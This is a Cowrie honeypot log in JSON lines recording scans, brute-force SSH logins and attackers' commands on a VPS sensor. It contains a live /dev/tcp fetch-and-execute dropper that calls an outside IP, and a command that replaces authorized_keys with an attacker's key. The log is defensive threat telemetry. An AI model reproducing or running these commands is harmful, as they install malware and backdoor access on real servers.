{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-09-08T16:30:15.219417Z","src_ip":"212.227.125.160","session":"c3a19cf604c4"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:30:21.044306Z","src_ip":"212.227.125.160","session":"c3a19cf604c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62646,"dst_ip":"1.2.3.4","dst_port":22,"session":"b00fdfc21de1","protocol":"ssh","message":"New connection: 212.227.235.229:62646 (1.2.3.4:22) [session: b00fdfc21de1]","sensor":"my-vps","timestamp":"2025-09-08T16:30:21.099365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T16:30:21.552456Z","src_ip":"212.227.235.229","session":"b00fdfc21de1"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-09-08T16:30:21.553668Z","src_ip":"212.227.235.229","session":"b00fdfc21de1"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:30:23.257118Z","src_ip":"212.227.235.229","session":"b00fdfc21de1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61954,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bbc46c5a1e2","protocol":"ssh","message":"New connection: 212.227.125.160:61954 (1.2.3.4:22) [session: 7bbc46c5a1e2]","sensor":"my-vps","timestamp":"2025-09-08T16:33:06.440231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-08T16:33:07.725292Z","src_ip":"212.227.125.160","session":"7bbc46c5a1e2"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-08T16:33:08.641159Z","src_ip":"212.227.125.160","session":"7bbc46c5a1e2"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:33:15.392354Z","src_ip":"212.227.125.160","session":"7bbc46c5a1e2"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":47918,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd82b0556a4b","protocol":"ssh","message":"New connection: 8.138.136.155:47918 (1.2.3.4:22) [session: dd82b0556a4b]","sensor":"my-vps","timestamp":"2025-09-08T16:34:08.205235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T16:34:08.206086Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T16:34:08.206776Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T16:34:08.909063Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:34:10.133806Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:34:10.623000Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T16:34:10.625186Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/3MvrHWGZI4 && chmod +x /tmp/3MvrHWGZI4 && /tmp/3MvrHWGZI4 o3tgnKY36GM5fOgurYRlY9jUa2CerDnhfDJj7jesn2F12tBhZ5qvLeFyMWDgN6+eZXXT2mt/mKgj72IxYu45poRgaNrMamKcsCjsZzpk6SivmwDa7kGqKuUjnnE8MzTrv4HiQlM=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/3MvrHWGZI4 && chmod +x /tmp/3MvrHWGZI4 && /tmp/3MvrHWGZI4 o3tgnKY36GM5fOgurYRlY9jUa2CerDnhfDJj7jesn2F12tBhZ5qvLeFyMWDgN6+eZXXT2mt/mKgj72IxYu45poRgaNrMamKcsCjsZzpk6SivmwDa7kGqKuUjnnE8MzTrv4HiQlM=\" &","sensor":"my-vps","timestamp":"2025-09-08T16:34:16.858469Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/owAqlg8pHk","message":"CMD: head -c 1458464 > /tmp/owAqlg8pHk","sensor":"my-vps","timestamp":"2025-09-08T16:34:16.862855Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T16:34:17.091964Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T16:34:17.096902Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T16:34:17.101099Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d280ac8202688d1a3201c58ba4df29881f9b85262f6b8d16a2437de193409a52","size":1956,"shasum":"d280ac8202688d1a3201c58ba4df29881f9b85262f6b8d16a2437de193409a52","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/d280ac8202688d1a3201c58ba4df29881f9b85262f6b8d16a2437de193409a52 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:34:17.102600Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:34:17.104409Z","src_ip":"8.138.136.155","session":"dd82b0556a4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":1958,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c260d2d7ca1","protocol":"telnet","message":"New connection: 212.227.235.229:1958 (1.2.3.4:23) [session: 2c260d2d7ca1]","sensor":"my-vps","timestamp":"2025-09-08T16:35:31.425639Z"}
{"eventid":"cowrie.session.closed","duration":12.715351581573486,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:35:44.140918Z","src_ip":"212.227.235.229","session":"2c260d2d7ca1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54370,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dfc99528c2e","protocol":"ssh","message":"New connection: 217.72.205.35:54370 (1.2.3.4:22) [session: 9dfc99528c2e]","sensor":"my-vps","timestamp":"2025-09-08T16:36:02.963350Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:36:02.964501Z","src_ip":"217.72.205.35","session":"9dfc99528c2e"}
{"eventid":"cowrie.session.connect","src_ip":"185.56.83.202","src_port":43560,"dst_ip":"1.2.3.4","dst_port":22,"session":"56625e20d33d","protocol":"ssh","message":"New connection: 185.56.83.202:43560 (1.2.3.4:22) [session: 56625e20d33d]","sensor":"my-vps","timestamp":"2025-09-08T16:38:03.775587Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:38:03.776259Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:38:03.794839Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.login.success","username":"root","password":"qwepoi","message":"login attempt [root/qwepoi] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:38:03.907680Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:38:03.961097Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T16:38:03.961855Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T16:38:03.963194Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:03.983834Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:38:04.119538Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T16:38:04.120260Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T16:38:04.141006Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:04.141916Z","src_ip":"185.56.83.202","session":"56625e20d33d"}
{"eventid":"cowrie.session.connect","src_ip":"185.56.83.202","src_port":43576,"dst_ip":"1.2.3.4","dst_port":22,"session":"29b97d09fd90","protocol":"ssh","message":"New connection: 185.56.83.202:43576 (1.2.3.4:22) [session: 29b97d09fd90]","sensor":"my-vps","timestamp":"2025-09-08T16:38:04.158710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:38:04.159688Z","src_ip":"185.56.83.202","session":"29b97d09fd90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T16:38:04.177722Z","src_ip":"185.56.83.202","session":"29b97d09fd90"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T16:38:04.290529Z","src_ip":"185.56.83.202","session":"29b97d09fd90"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:38:05.312959Z","src_ip":"185.56.83.202","session":"29b97d09fd90"}
{"eventid":"cowrie.session.connect","src_ip":"185.56.83.202","src_port":43592,"dst_ip":"1.2.3.4","dst_port":22,"session":"774af247a5d6","protocol":"ssh","message":"New connection: 185.56.83.202:43592 (1.2.3.4:22) [session: 774af247a5d6]","sensor":"my-vps","timestamp":"2025-09-08T16:38:05.330202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T16:38:05.331130Z","src_ip":"185.56.83.202","session":"774af247a5d6"}
